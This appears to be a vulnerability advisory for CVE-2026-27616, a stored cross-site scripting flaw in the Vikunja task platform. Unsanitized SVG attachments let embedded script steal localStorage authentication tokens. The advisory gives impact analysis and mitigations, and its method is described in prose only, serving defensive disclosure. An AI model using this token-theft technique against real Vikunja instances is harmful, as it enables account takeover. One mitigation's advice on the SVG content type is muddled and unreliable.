CVE-2026-27616 is a cross-site scripting (XSS) vulnerability classified under CWE-79 affecting the Vikunja task management platform versions prior to 2.0.0. Vikunja allows users to upload SVG files as task attachments, but does not sanitize or neutralize potentially malicious content within these SVGs. SVG is an XML-based vector image format that supports embedded JavaScript through elements like <script> tags and event handlers such as onload. When a user accesses the uploaded SVG via its direct URL, the browser renders the SVG inline under the application's origin, causing any embedded JavaScript to execute with the privileges of the authenticated user. Since Vikunja stores authentication tokens in localStorage, the malicious script can access these tokens and exfiltrate them to an attacker-controlled server. This compromises user accounts and potentially allows attackers to perform unauthorized actions within the application. Exploitation requires that an attacker has the ability to upload SVG files (which implies at least some authenticated privileges) and that a victim user accesses the malicious SVG URL, thus requiring user interaction. The vulnerability has a CVSS 3.1 score of 7.3 (high severity), reflecting network attack vector, low attack complexity, privileges required, user interaction, and high impact on confidentiality and integrity but no impact on availability. The issue is resolved in Vikunja version 2.0.0 by sanitizing SVG content before storage or disallowing unsafe SVG features. No known exploits in the wild have been reported as of the publication date.

This vulnerability poses a significant risk to organizations using Vikunja versions prior to 2.0.0, especially those that allow multiple users to upload files and share task attachments. Successful exploitation can lead to theft of authentication tokens, enabling attackers to hijack user sessions and gain unauthorized access to sensitive task management data. This can result in data breaches, unauthorized task modifications, and potential lateral movement within an organization’s infrastructure if Vikunja is integrated with other systems. Since the attack requires user interaction (accessing the malicious SVG URL), phishing or social engineering could be used to lure victims. The impact is particularly severe for organizations relying on Vikunja for critical project management or containing sensitive information. Additionally, because the vulnerability affects an open-source self-hosted platform, organizations with limited security resources may be slower to patch, increasing exposure time. The lack of known exploits in the wild reduces immediate risk but does not eliminate the threat, as the vulnerability is straightforward to exploit once a malicious SVG is uploaded.

1. Upgrade all Vikunja instances to version 2.0.0 or later immediately to apply the official patch that sanitizes SVG content. 2. Until patched, disable or restrict SVG file uploads entirely to prevent malicious SVG files from being uploaded. 3. Implement strict content security policies (CSP) that restrict script execution and limit the origins from which scripts can be loaded to reduce the impact of injected scripts. 4. Educate users to avoid clicking on suspicious or unexpected SVG file links, especially those received via email or chat. 5. Monitor logs for unusual file uploads and access patterns to detect potential exploitation attempts. 6. If possible, configure the application or web server to serve SVG files with the Content-Type header set to 'image/svg+xml' and consider serving them from a separate domain or subdomain to isolate the execution context and prevent token theft via same-origin policy. 7. Review and limit user privileges to reduce the risk of unauthorized file uploads. 8. Conduct regular security audits and penetration testing focusing on file upload functionalities.